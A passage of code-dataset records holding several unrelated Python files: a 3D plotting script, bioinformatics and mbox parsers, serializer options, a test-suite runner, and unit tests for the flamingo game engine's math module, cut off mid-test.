ret\n","sub_path":"lanedet/runner/trainer/resa.py","file_name":"resa.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"550343691","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport pandas as pd\n\ndef disp_plot(result,box,num):\n ax.scatter(result[:,0],result[:,1],result[:,2],c='g')\n for i in range(box.shape[1]):\n j=box[num][i]\n ax.scatter(result[j,0],result[j,1],result[j,2],c='r')\n plt.show()\n\n#️⃣data=np.loadtxt(\"example_elipsoid_data.csv\",delimiter=\",\")\ndata=np.loadtxt(\"example_swithroll_data.csv\",delimiter=\",\")\nmin_box=np.loadtxt(\"min.csv\",delimiter=\",\")\n#data=np.loadtxt(\"example_2circles.csv\",delimiter=\",\")\n\nsplit_n=[i*0.1 for i in range(1,10,2)]\nindices=[int(data.shape[0]*n) for n in split_n]\nresult_1,result_2,result_3,result_4,result_5,result_6=np.split(data, indices)\ncolor_box=['b','g','r','c','m','y','k']\nfig = plt.figure()\nax = Axes3D(fig)\n\n#disp_plot(result_1,min_box,0)\n#disp_plot(result_2,min_box,1)\ndisp_plot(result_3,min_box,2)\n#disp_plot(result_4,min_box,3)\n#disp_plot(result_5,min_box,4)\n#disp_plot(result_6,min_box,5)\n","sub_path":"3D_show.py","file_name":"3D_show.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"595743885","text":"def readFastaMul(nomFi):\n\tf=open(nomFi,\"r\")\n\tlines=f.readlines()\n\tf.close()\n\tDiconom={}\n\tfor l in lines:\n\t\tif l[0] == '>':\n\t\t\tinfo=l.split(\"|\")\n\t\t\tDiconom[info[0][1:]]=[]\n\t\t\tDiconom[info[0][1:]].append(info[1])\n\t\t\tDiconom[info[0][1:]].append(info[2])\n\t\t\tDiconom[info[0][1:]].append(info[3])\n\treturn Diconom\n\t#return lesSeq\n\n\n\n\ndef readpartis(inputfile):\n\tDicoRep={}\n\tf=open(inputfile,\"r\")\n\tlignes=f.readlines()\n\tf.close()\n\tfor l in range(1,len(lignes)):\n\t\tsplit=lignes[l].split(\" \")\n\t\tDicoRep[split[2]]=[]\n\t\tDicoRep[split[2]].append(split[3])\n\t\tDicoRep[split[2]].append(split[4])\n\t\tDicoRep[split[2]].append(split[5])\n\treturn DicoRep\n\n\ndef writeoutput(Diconom,DicoRep):\n\toutput=open(\"outpartis80Sim.txt\",\"w\")\n\toutput.write(\"\\n\")\n\tfor key in Diconom.keys():\n\t\tRep='# '+Diconom[key][0]+' '+Diconom[key][1]+' '+Diconom[key][2]+'\\n'\n\t\toutput.write(Rep)\n\t\tRes='> '+DicoRep[key][0]+' '+DicoRep[key][1]+' '+DicoRep[key][2] +'\\n'\n\t\toutput.write(Res)\n\t\toutput.write(\"\\n\")\n\treturn 0\n\nDiconom=readFastaMul(\"simple_plus_indels_10000_80.fa\")\nDicoRep=readpartis(\"out80.txt\")\nwriteoutput(Diconom,DicoRep)\n","sub_path":"code/simulated/partis/resultbasedonD.py","file_name":"resultbasedonD.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"255020240","text":"f = open('mbox-short.txt')\nd = dict()\nm = 0\nfor line in f:\n line = line.rstrip()\n l = line.split()\n if len(l) <= 1 or l[0] != 'From' : continue\n d[l[1]] = d.get(l[1],0) + 1\n if d[l[1]] > m :\n m = d[l[1]]\n p = l[1]\nprint(p,m)\n","sub_path":"c2w5/c2w5p1.py","file_name":"c2w5p1.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"539556491","text":"# -*- coding: utf-8 -*-\n\nfrom aserializer.utils.parsers import Parser\n\n\n\nclass MetaOptions(object):\n\n def __init__(self, meta):\n self.fields = getattr(meta, 'fields', [])\n self.exclude = getattr(meta, 'exclude', [])\n\n\nclass SerializerMetaOptions(MetaOptions):\n\n def __init__(self, meta):\n super(SerializerMetaOptions, self).__init__(meta)\n self.parser = getattr(meta, 'parser', Parser)\n\n\nclass CollectionMetaOptions(MetaOptions):\n\n def __init__(self, meta):\n super(CollectionMetaOptions, self).__init__(meta)\n self.serializer = getattr(meta, 'serializer', None)\n self.with_metadata = getattr(meta, 'with_metadata', True)\n self.metadata_key = getattr(meta, 'metadata_key', '_metadata')\n self.items_key = getattr(meta, 'items_key', 'items')\n self.offset_key = getattr(meta, 'offset_key', 'offset')\n self.limit_key = getattr(meta, 'limit_key', 'limit')\n self.total_count_key = getattr(meta, 'total_count_key', 'totalCount')\n self.sort = getattr(meta, 'sort', [])\n self.validation = getattr(meta, 'validation', False)\n","sub_path":"aserializer/utils/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"570463362","text":"# Test Suite \n\nimport unittest\nfrom test_graph import TestGraph\nfrom github_service_test import TestGithubService\n\n\ntest_classes_to_run = [TestGraph, TestGithubService, TestDiff]\n\nloader = unittest.TestLoader()\n\nsuites_list = []\nfor test_class in test_classes_to_run:\n suite = loader.loadTestsFromTestCase(test_class)\n suites_list.append(suite)\n\nbig_suite = unittest.TestSuite(suites_list)\n\nrunner = unittest.TextTestRunner()\nresults = runner.run(big_suite)\n\n#suite = unittest.TestLoader().loadTestsFromTestCase().loadTestsFromTestCase()\n#unittest.TextTestRunner(verbosity=2).run(suite)","sub_path":"test_suite.py","file_name":"test_suite.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"400273987","text":"#!/usr/bin/env python\r\n\r\n## flamingo - 2D Game Engine\r\n## Copyright (C) 2009 Bradley Zeis\r\n##\r\n## This program is free software: you can redistribute it and/or modify\r\n## it under the terms of the GNU General Public License as published by\r\n## the Free Software Foundation, either version 3 of the License, or\r\n## (at your option) any later version.\r\n##\r\n## This program is distributed in the hope that it will be useful,\r\n## but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n## GNU General Public License for more details.\r\n##\r\n## You should have received a copy of the GNU General Public License\r\n## along with this program. If not, see .\r\n##\r\n## Bradley Zeis\r\n## flamingoengine@gmail.com\r\n\r\n\"\"\"Unit Tests for flamingo.flmath\"\"\"\r\n\r\nimport unittest\r\nimport flamingo\r\nimport math\r\nimport pickle\r\nfrom numbers import Number\r\n\r\nclass TestPow(unittest.TestCase):\r\n def setUp(self):\r\n self.data = [2, 3, 4, 7, 17, 710, 483, 60495, 712345]\r\n self.bad = [\"hello world!\", [1, 2, 3], {'foo': 'bar'},\r\n flamingo.flmath.Vector([1, 1])]\r\n\r\n def testClosestIsNumber(self):\r\n for d in self.data:\r\n self.assertTrue(isinstance(flamingo.flmath.closest_pow2(d), Number))\r\n\r\n def testClosestIsPow2(self):\r\n for d in self.data:\r\n result = flamingo.flmath.closest_pow2(d)\r\n self.assertEqual(math.log(result, 2) % 1, 0.0)\r\n\r\n def testClosestIsOne(self):\r\n for d in self.data:\r\n self.assertTrue(flamingo.flmath.closest_pow2(d) >= 1)\r\n\r\n def testClosestIsClosest(self):\r\n for d in self.data:\r\n less = math.pow(2, math.ceil(math.log(d)/math.log(2.0)))\r\n greater = math.pow(2, math.floor(math.log(d)/math.log(2.0)))\r\n lessd = d - less\r\n greaterd = greater - d\r\n\r\n if lessd < greaterd:\r\n self.assertEqual(flamingo.flmath.closest_pow2(d), greater)\r\n else:\r\n self.assertEqual(flamingo.flmath.closest_pow2(d), less)\r\n\r\n def testClosestBad(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError,\r\n flamingo.flmath.closest_pow2, b)\r\n\r\n def testClosestNeg(self):\r\n for d in self.data:\r\n self.assertRaises(ValueError, flamingo.flmath.closest_pow2, -d)\r\n\r\n def testNextIsNumber(self):\r\n for d in self.data:\r\n self.assertTrue(isinstance(flamingo.flmath.next_pow2(d), Number))\r\n\r\n def testNextIsPow2(self):\r\n for d in self.data:\r\n result = flamingo.flmath.next_pow2(d)\r\n self.assertEqual(math.log(result, 2) % 1, 0.0)\r\n\r\n def testNextIsOne(self):\r\n for d in self.data:\r\n self.assertTrue(flamingo.flmath.next_pow2(d) >= 1)\r\n\r\n def testNextGreater(self):\r\n for d in self.data:\r\n result = flamingo.flmath.next_pow2(d)\r\n self.assertTrue(result >= d)\r\n\r\n def testNextBad(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError, flamingo.flmath.next_pow2, b)\r\n\r\n def testNextNeg(self):\r\n for d in self.data:\r\n self.assertRaises(ValueError, flamingo.flmath.next_pow2, -d)\r\n\r\n def testPrevIsNumber(self):\r\n for d in self.data:\r\n self.assertTrue(isinstance(flamingo.flmath.prev_pow2(d), Number))\r\n\r\n def testPrevIsPow2(self):\r\n for d in self.data:\r\n result = flamingo.flmath.prev_pow2(d)\r\n self.assertEqual(math.log(result, 2) % 1, 0.0)\r\n\r\n def testPrevIsOne(self):\r\n for d in self.data:\r\n self.assertTrue(flamingo.flmath.prev_pow2(d) >= 1)\r\n\r\n def testPrevLess(self):\r\n for d in self.data:\r\n result = flamingo.flmath.prev_pow2(d)\r\n if result is None:\r\n self.assertTrue(False)\r\n self.assertTrue(result <= d)\r\n\r\n def testPrevBad(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError, flamingo.flmath.prev_pow2, b)\r\n\r\n def testPrevNeg(self):\r\n for d in self.data:\r\n self.assertRaises(ValueError, flamingo.flmath.prev_pow2, -d)\r\n\r\n\r\nclass TestDistance(unittest.TestCase):\r\n def setUp(self):\r\n ## data = [[point, point, distance, distance_sq]]\r\n self.data = [[(0, 0), (0, 1), 1, 1],\r\n [(2.5, 2),(4.76, 3.1), 2.5134, 6.3176],\r\n [(10, 16),(100, 160), 169.8116, 28836],\r\n [flamingo.flmath.Vector([1.2, 1]), flamingo.flmath.Vector([16, 1]), 14.8, 219.04],\r\n [(0, 0), (0, 0), 0, 0],\r\n [flamingo.flmath.Vector([0, 0]), flamingo.flmath.Vector([0, 0]), 0, 0]]\r\n\r\n self.long = [[(21, 4, 6, 4, 3), (14, 16, 71, 723, 5)],\r\n [(10, 9, 8, 7, 6, 5, 4, 3, 2, 1), (1, 2, 3, 4, 5, 6, 7, 8, 9, 10)],\r\n [(1, 2, 3, 4), (5, 4, 3, 2, 1)]]\r\n\r\n self.short = [[(), ()]]\r\n\r\n self.bad = [[\"hello\", \"world\"],\r\n [{'foo': 'bar'}, {'bar': 'foo'}],\r\n [\"hello world\", 35]]\r\n\r\n def testIsNumber(self):\r\n for d in self.data:\r\n self.assertTrue(isinstance(flamingo.flmath.distance(d[0], d[1]), Number))\r\n\r\n def testIsPos(self):\r\n for d in self.data:\r\n self.assertTrue(flamingo.flmath.distance(d[0], d[1]) >= 0)\r\n\r\n def testValue(self):\r\n for d in self.data:\r\n result = flamingo.flmath.distance(d[0], d[1])\r\n self.assertEqual(round(result, 2), round(d[2], 2))\r\n\r\n def testBad(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError, flamingo.flmath.distance, b[0],b[1])\r\n\r\n ##-------- Sq\r\n def testIsNumberSq(self):\r\n for d in self.data:\r\n self.assertTrue(isinstance(flamingo.flmath.distance_sq(d[0], d[1]), Number))\r\n\r\n def testIsPosSq(self):\r\n for d in self.data:\r\n self.assertTrue(flamingo.flmath.distance_sq(d[0], d[1]) >= 0)\r\n\r\n def testValueSq(self):\r\n for d in self.data:\r\n result = flamingo.flmath.distance_sq(d[0], d[1])\r\n self.assertEqual(round(result, 2), round(d[3], 2))\r\n\r\n def testBadSq(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError, flamingo.flmath.distance_sq, b[0],b[1])\r\n\r\n\r\nclass TestMidpoint(unittest.TestCase):\r\n def setUp(self):\r\n ## data = [[point, point, midpoint]]\r\n self.data = [[(0, 0), (0, 1), (0, 0.5)],\r\n [(2.5, 2),(4.76, 3.1), (3.63, 2.55)],\r\n [(10, 16),(100, 160), (55, 88)],\r\n [flamingo.flmath.Vector([1.13, 1]), (16, 1), (8.565, 1)],\r\n [(0, 0), (0, 0), (0, 0)]]\r\n\r\n self.wrong = [[(), ()],\r\n [(2,), (1,)]]\r\n\r\n self.bad = [[\"hello\", \"world\"],\r\n [{'foo': 'bar'}, {'bar': 'foo'}],\r\n [\"hello world\", 35]]\r\n\r\n def testValue(self):\r\n for d in self.data:\r\n result = flamingo.flmath.midpoint(d[0], d[1])\r\n self.assertEqual(round(result[0]), round(d[2][0]))\r\n self.assertEqual(round(result[1]), round(d[2][1]))\r\n\r\n def testWrong(self):\r\n for d in self.wrong:\r\n self.assertRaises(TypeError, flamingo.flmath.midpoint, d[0], d[1])\r\n\r\n def testBad(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError, flamingo.flmath.midpoint, b[0],b[1])\r\n\r\n\r\nclass TestArea(unittest.TestCase):\r\n def setUp(self):\r\n ## [[data], area, signed_area]\r\n self.data = [[ [(1, 1), (-1, 1), (-1, -1), (1, -1)], 4, 4],\r\n [ [(1, 1), (1, -1), (-1, -1), (-1, 1)], 4, -4],\r\n [ [(0, 15.4), (-64.24, -10.1), (14.4, -10.1)], 1002.66, 1002.66 ],\r\n [ [(0, 15.4), (14.4, -10.1), (-64.24, -10.1)], 1002.66, -1002.66 ]]\r\n\r\n self.odata = [[ [(1, 1), (-1, 1), (-1, -1), (1, -1)], True],\r\n [ [(1, 1), (1, -1), (-1, -1), (-1, 1)], False],\r\n [ [(0, 15.4), (-64.24, -10.1), (14.4, -10.1)], True],\r\n [ [(0, 15.4), (14.4, -10.1), (-64.24, -10.1)], False]]\r\n\r\n self.bad = [[\"meow\", \"rawrf\", \"ROAR\"],\r\n [(\"meow\", \"woof\"), (\"woof\", \"meow\"), (\"rawr\", \"roar\")],\r\n [{'foo': 'bar'}, {'foo': 'bar'}, {'foo': 'bar'}],\r\n [(1,), (2,), (3,)],\r\n [(1, 2), (3, 4)],\r\n [(1, 2)],\r\n []]\r\n\r\n ##-------- Pos Area\r\n def testIsNumber(self):\r\n for d in self.data:\r\n self.assertTrue(isinstance(flamingo.flmath.area(d[0]), Number))\r\n\r\n def testIsPos(self):\r\n for d in self.data:\r\n self.assertTrue(flamingo.flmath.area(d[0]) > 0)\r\n\r\n def testValue(self):\r\n for d in self.data:\r\n result = flamingo.flmath.area(d[0])\r\n self.assertEqual(round(result, 2), round(d[1], 2))\r\n\r\n def testBad(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError, flamingo.flmath.area, b)\r\n\r\n ##-------- Signed Area\r\n def testIsNumberS(self):\r\n for d in self.data:\r\n self.assertTrue(isinstance(flamingo.flmath.signed_area(d[0]), Number))\r\n\r\n def testValueS(self):\r\n for d in self.data:\r\n result = flamingo.flmath.signed_area(d[0])\r\n self.assertEqual(round(result, 2), round(d[2], 2))\r\n\r\n def testBadS(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError, flamingo.flmath.signed_area, b)\r\n\r\n ##-------- Orientation\r\n def testValueO(self):\r\n for d in self.odata:\r\n result = flamingo.flmath.orientation_poly(d[0])\r\n self.assertEqual(result, d[1])\r\n\r\n def testBadO(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError, flamingo.flmath.orientation_poly, b)\r\n\r\n\r\nclass TestNormalizeAngle(unittest.TestCase):\r\n def setUp(self):\r\n self.datad = [[45, 45],\r\n [360, 0],\r\n [400, 40],\r\n [4000, 40],\r\n [-100, 260]]\r\n self.datar = [[math.radians(45), math.radians(45)],\r\n [math.radians(360), math.radians(0)],\r\n [math.radians(400), math.radians(40)],\r\n [math.radians(4000), math.radians(40)],\r\n [math.radians(-100), math.radians(260)]]\r\n self.bad = [\"meow\",\r\n [16],\r\n {'foo': 'bar'}]\r\n\r\n ##-------- Degress\r\n def testNumber(self):\r\n for i in range(0, 1000):\r\n self.assertTrue(isinstance(flamingo.flmath.normalize_angle(i), Number))\r\n\r\n def testIsPos(self):\r\n for i in range(0, 1000):\r\n self.assertTrue(flamingo.flmath.normalize_angle(i) >= 0)\r\n\r\n def testValue(self):\r\n for d in self.datad:\r\n self.assertEqual(flamingo.flmath.normalize_angle(d[0]), d[1])\r\n\r\n def testBad(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError, flamingo.flmath.normalize_angle, b)\r\n\r\n ##-------- Radians\r\n def testNumberR(self):\r\n for i in range(0, 1000):\r\n self.assertTrue(isinstance(flamingo.flmath.normalize_angler(i), Number))\r\n\r\n def testIsPosR(self):\r\n for i in range(0, 1000):\r\n self.assertTrue(flamingo.flmath.normalize_angler(i) >= 0)\r\n\r\n def testValueR(self):\r\n for d in self.datar:\r\n self.assertAlmostEqual(flamingo.flmath.normalize_angler(d[0]), d[1])\r\n\r\n def testBadR(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError, flamingo.flmath.normalize_angler, b)\r\n\r\n\r\nclass TestNormalizePoly(unittest.TestCase):\r\n def setUp(self):\r\n self.p = [flamingo.flmath.Vector((-1,1)), (-1,-1), [1,-1], (1,1)]\r\n\r\n self.bad = [[1, 2, 3],\r\n [{'foo': 'bar'}, \"meow!\", (1, 2), [\"3\",\"4\"]],\r\n [(1,), (2,), (3,)]]\r\n\r\n def testNormalize(self):\r\n self.assertEqual(flamingo.flmath.normalize_poly(self.p), self.p)\r\n p = [flamingo.flmath.Vector((-1,1)), (-1,-1), [1,-1], (1,1), (-1, 1)]\r\n self.assertEqual(flamingo.flmath.normalize_poly(p), self.p)\r\n self.assertEqual(flamingo.flmath.normalize_poly(self.p, 1), p)\r\n\r\n p = [(-1,1), (-1,-1), [1,-1], (1,1), (-1, 1), (-1,-1)]\r\n self.assertEqual(flamingo.flmath.normalize_poly(p), self.p)\r\n self.assertEqual(flamingo.flmath.normalize_poly(self.p, 2), p)\r\n\r\n def testBad(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError, flamingo.flmath.normalize_poly, b)\r\n\r\n\r\nclass TestPolySimplify(unittest.TestCase):\r\n def setUp(self):\r\n self.data = [[(1, 0), (1, 8.12), (19.95, 5), (-1, -5), (-1.25, -5.15)],\r\n [[-1, 0], [-1, -4.12], [-16.95, -5], [14, 5], [1.25, 5.15]]]\r\n\r\n self.bad = [[\"meow\", \"rawrf\", \"ROAR\"],\r\n [(\"meow\", \"woof\"), (\"woof\", \"meow\"), (\"rawr\", \"roar\")],\r\n [{'foo': 'bar'}, {'foo': 'bar'}, {'foo': 'bar'}]]\r\n\r\n def testReturnsList(self):\r\n for i in range(8):\r\n for d in self.data:\r\n self.assertTrue(isinstance(flamingo.flmath.simplify_poly(d, i), list))\r\n\r\n def testReturnsCoords(self):\r\n for i in range(8):\r\n for d in self.data:\r\n result = flamingo.flmath.simplify_poly(d, i)\r\n b = True\r\n\r\n for p in result:\r\n if not (isinstance(p[0], Number) and isinstance(p[1], Number)):\r\n b = b and False\r\n break\r\n\r\n self.assertTrue(b)\r\n\r\n def testBad(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError, flamingo.flmath.simplify_poly, b, 1)\r\n\r\nclass TestVector(unittest.TestCase):\r\n def setUp(self):\r\n self.v = flamingo.flmath.Vector((111, 222))\r\n\r\n self.bad = [(8, {'foo': 'bar'}),\r\n (\"meow!\", \"imah vector!\")]\r\n\r\n def testAccess(self):\r\n v = self.v.copy()\r\n self.assertEqual(v.x, 111)\r\n self.assertEqual(v.y, 222)\r\n v.x = 333\r\n v[1] = 444\r\n self.assertEqual(v[0], 333)\r\n self.assertEqual(v[1], 444)\r\n\r\n def testMath(self):\r\n v = self.v.copy()\r\n self.assertEqual(v + 1, flamingo.flmath.Vector((112, 223)))\r\n self.assertEqual(v - 2, [109,220])\r\n self.assertEqual(v * 3, (333,666))\r\n self.assertEqual(v / 2.0, flamingo.flmath.Vector((55.5, 111)))\r\n self.assertEqual(v / 2, (55.5, 111))\r\n self.assertEqual(v ** flamingo.flmath.Vector((2,3)), [12321, 10941048])\r\n self.assertEqual(v + [-11, 78], flamingo.flmath.Vector((100, 300)))\r\n\r\n def testReverseMath(self):\r\n v = self.v.copy()\r\n self.assertEqual(1 + v, flamingo.flmath.Vector((112,223)))\r\n self.assertEqual(2 - v, [-109,-220])\r\n self.assertEqual(3 * v, (333,666))\r\n self.assertEqual([111,222] ** flamingo.flmath.Vector((2,3)), [12321, 10941048])\r\n self.assertEqual(v + flamingo.flmath.Vector((1,1)), [112, 223])\r\n\r\n def testInplaceMath(self):\r\n inplace_vec = flamingo.flmath.Vector((5, 13))\r\n inplace_src = flamingo.flmath.Vector((inplace_vec))\r\n inplace_vec *= .5\r\n inplace_vec += .5\r\n inplace_vec /= 3\r\n inplace_vec += flamingo.flmath.Vector((-1, -1))\r\n alternate = (inplace_src*.5 + .5)/3 + [-1, -1]\r\n self.assertEqual(inplace_vec, alternate)\r\n\r\n def testUnary(self):\r\n v = self.v.copy()\r\n v = -v\r\n self.assertEqual(v, [-111,-222])\r\n v = abs(v)\r\n self.assertEqual(v, [111,222])\r\n\r\n def testLength(self):\r\n v = flamingo.flmath.Vector((3, 4))\r\n self.assertEqual(v.length, 5)\r\n v.length = 10\r\n self.assertEqual(v, [6, 8])\r\n\r\n\r\n def testAngles(self):\r\n v = flamingo.flmath.Vector((0,3))\r\n self.assertEqual(v.angle, 90)\r\n v.angle = 0\r\n self.assertEqual(v, (3, 0))\r\n v2 = (-3,0)\r\n self.assertEqual(v.angle_about(v2), 0)\r\n v2 = flamingo.flmath.Vector(v2)\r\n self.assertEqual(v2.angle_about(v), 180)\r\n v.angle = 90, (0,0)\r\n self.assertEqual(v, [0, 3])\r\n\r\n def testComparison(self):\r\n int_vec = flamingo.flmath.Vector((3, -2))\r\n flt_vec = flamingo.flmath.Vector((3.0, -2.0))\r\n zero_vec = flamingo.flmath.Vector((0, 0))\r\n self.assertEqual(int_vec, flt_vec)\r\n self.assertNotEqual(int_vec, zero_vec)\r\n self.assertFalse(flt_vec == zero_vec)\r\n self.assertFalse(flt_vec != int_vec)\r\n self.assertEqual(int_vec, (3, -2))\r\n self.assertNotEqual(int_vec, [0, 0])\r\n self.assertNotEqual(int_vec, 5)\r\n\r\n def testConversion(self):\r\n self.assertEqual(list(self.v), [111, 222])\r\n self.assertTrue(isinstance(list(self.v), list))\r\n self.assertEqual(tuple(self.v), (111, 222))\r\n self.assertTrue(isinstance(tuple(self.v), tuple))\r\n\r\n def testPickle(self):\r\n testvec = flamingo.flmath.Vector((5, .3))\r\n testvec_str = pickle.dumps(testvec)\r\n loaded_vec = pickle.loads(testvec_str)\r\n self.assertEqual(testvec, loaded_vec)\r\n\r\n def testBad(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError, flamingo.flmath.Vector, b)\r\n\r\n\r\nclass TestPolygon(unittest.TestCase):\r\n def setUp(self):\r\n self.p = flamingo.flmath.Polygon([(-1,1), (-1,-1), (1,-1), (1,1)])\r\n\r\n self.bad = [[{'foo': 'bar'}, \"meow!\", (1, 2), [\"3\",\"4\"]]]\r\n\r\n def testAccess(self):\r\n p = self.p.copy()\r\n self.assertEqual(p[0], (-1, 1))\r\n p[0] = (-5, 5)\r\n self.assertEqual(p[0], (-5, 5))\r\n self.assertTrue(isinstance(p[0], flamingo.flmath.Vector))\r\n self.assertEqual(p.center, (-1, 1))\r\n p[1] = -4, 7\r\n self.assertEqual(p[1], (-4, 7))\r\n p[3] = 16\r\n self.assertEqual(p[3], (16, 16))\r\n\r\n def testComparison(self):\r\n p = self.p.copy()\r\n self.assertEqual(p, [(-1,1), (-1,-1), (1,-1), (1,1)])\r\n q = flamingo.flmath.Polygon([(-1,1), (-1,-1), (1,-1), (1,1)])\r\n self.assertEqual(p, q)\r\n q[0] = -5, 5\r\n self.assertNotEqual(p, q)\r\n self.assertNotEqual(q, p)\r\n\r\n def testAppend(self):\r\n p = self.p.copy()\r\n self.assertRaises(AttributeError, flamingo.flmath.Polygon.append, p, (0, 2.5))\r\n\r\n p.enable(flamingo.constants.POLYGON_MUTABLE_LENGTH)\r\n p.append((0, 2.5))\r\n self.assertEqual(len(p), 5)\r\n self.assertEqual(p.center, (0, 0.5))\r\n p[4] -= 0, 1\r\n self.asserEqual(p.center, (0,0))\r\n p.append((-0.5, 1))\r\n self.assertEqual(len(p), 6)\r\n self.asserEqual(p.center, (0,0))\r\n\r\n def testInsert(self):\r\n p = self.p.copy()\r\n self.assertRaises(AttributeError, flamingo.flmath.Polygon.insert, p, 1, (-2.5, 0))\r\n\r\n p.enable(flamingo.constants.POLYGON_MUTABLE_LENGTH)\r\n p.insert(1, (-2.5, 0))\r\n self.assertEqual(len(p), 5)\r\n self.assertEqual(p.center, (-0.5, 0))\r\n\r\n def testRemove(self):\r\n p = self.p.copy()\r\n self.assertRaises(AttributeError, flamingo.flmath.Polygon.insert, p, 3)\r\n\r\n p.enable(flamingo.constants.POLYGON_MUTABLE_LENGTH)\r\n p.remove(3)\r\n self.assertEqual(len(p), 3)\r\n self.assertEqual(p.center, -1.0/3)\r\n self.assertRaises(TypeError, Polygon.remove, p, 1)\r\n\r\n def testConversion(self):\r\n p = self.p.copy()\r\n self.assertEqual(list(p), p)\r\n self.assertTrue(isinstance(list(p), list))\r\n self.assertEqual(tuple(p), p)\r\n self.assertTrue(isinstance(tuple(p), tuple))\r\n\r\n def testAngle(self):\r\n p = self.p.copy()\r\n self.assertEqual(p.angle, 0)\r\n p.center = 1,0\r\n self.assertEqual(p.angle, 0)\r\n p.center = 0, 10\r\n self.assertEqual(p.angle, 90)\r\n\r\n def testOrientation(self):\r\n p = self.p.copy()\r\n self.assertEqual(p.orientation, 0)\r\n l = list(p)\r\n p.orientation = 90\r\n self.assertNotEqual(p, l)\r\n self.assertAlmostEqual(p[0].x, -1, 0.001)\r\n self.assertAlmostEqual(p[0].y, -1, 0.001)\r\n self.assertAlmostEqual(p[1].x, 1, 0.001)\r\n self.assertAlmostEqual(p[1].y, -1, 0.001)\r\n self.assertAlmostEqual(p[2].x, 1, 0.001)\r\n self.assertAlmostEqual(p[2].y, 1, 0.001)\r\n self.assertAlmostEqual(p[3].x, -1, 0.001)\r\n self.assertAlmostEqual(p[3].y, 1, 0.001)\r\n\r\n def testCollision(self):\r\n p1 = self.p.copy()\r\n p2 = [(-0.5,0.5), (-0.5,-0.5), (0.5,-0.5), (0.5,0.5)]\r\n self.assertTrue(p1.intersects(p2))\r\n self.assertTrue(p1.intersects(p1))\r\n p1.center = 90, -60\r\n self.assertFalse(p1.intersects(p2))\r\n p1.center = 1.5, 0\r\n self.assertTrue(p1.intersects(p2))\r\n p1.center = 0, -1.5\r\n self.assertTrue(p1.intersects(p2))\r\n p1.center = -1.4, 0\r\n self.assertTrue(p1.intersects(p2))\r\n\r\n def testPickle(self):\r\n testpoly = flamingo.flmath.Polygon([(-1,1), (-1,-1), (1,-1), (1,1)])\r\n testpoly_str = pickle.dumps(testpoly)\r\n loaded_poly = pickle.loads(testpoly_str)\r\n self.assertEqual(testpoly, loaded_poly)\r\n\r\n def testBad(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError, flamingo.flmath.Polygon, b)\r\n\r\n\r\nclass TestRect(unittest.TestCase):\r\n def setUp(self):\r\n self.p = flamingo.flmath.Rect((0, 0), 2, 2)\r\n\r\n self.bad = [[1, 2, 3],\r\n [{'foo': 'bar'}, \"meow!\", (1, 2), [\"3\",\"4\"]],\r\n [(1,), (2,), (3,)]]\r\n\r\n def testAccess(self):\r\n p = self.p.copy()\r\n self.assertEqual(p.center, (0,0))\r\n self.assertEqual(p.topleft, (-1, 1))\r\n self.assertEqual(p.bottomleft, (-1, -1))\r\n p.center = 1, 3\r\n self.assertEqual(p.center, (1, 3))\r\n p.topright = 4\r\n self.assertEqual(p.topright, (4, 4))\r\n self.assertEqual(p.bottomright, (4, 2))\r\n p[1] = 4, 1\r\n self.assertEqual(p.topright, (4, 3))\r\n self.assertEqual(p.bottomright, (4, 1))\r\n p.width = 4\r\n self.assertEqual(p.topright, (5, 3))\r\n p.size = (1, 1)\r\n self.assertEqual(p.topleft, (2.5, 2.5))\r\n\r\n def testComparison(self):\r\n p = self.p.copy()\r\n q = [(-1, -1), (1, -1), (1, 1), (-1, 1)]\r\n self.assertEqual(p, q)\r\n q[3] = (-1, 2)\r\n self.assertNotEqual(p, q)\r\n\r\n def testAppend(self):\r\n p = self.p.copy()\r\n self.assertRaises(TypeError, flamingo.flmath.Rect.append, p, (0,0))\r\n\r\n def testInsert(self):\r\n p = self.p.copy()\r\n self.assertRaises(TypeError, flamingo.flmath.Rect.insert, p, 1, (0,0))\r\n\r\n def testRemove(self):\r\n p = self.p.copy()\r\n self.assertRaises(TypeError, flamingo.flmath.Rect.remove, p, 1)\r\n\r\n def testAngle(self):\r\n p = self.p.copy()\r\n self.assertEqual(p.angle, 0)\r\n p.center = 1,0\r\n self.assertEqual(p.angle, 0)\r\n p.center = 0, 10\r\n self.assertEqual(p.angle, 90)\r\n p.angle = 0\r\n self.assertEqual(p.center, (10, 0))\r\n\r\n def testOrientation(self):\r\n p = self.p.copy()\r\n self.assertEqual(p.orientation, 0)\r\n l = list(p)\r\n p.orientation = 90\r\n self.assertNotEqual(p, l)\r\n self.assertAlmostEqual(p[0].x, 1, 0.001)\r\n self.assertAlmostEqual(p[0].y, -1, 0.001)\r\n self.assertAlmostEqual(p[1].x, 1, 0.001)\r\n self.assertAlmostEqual(p[1].y, 1, 0.001)\r\n 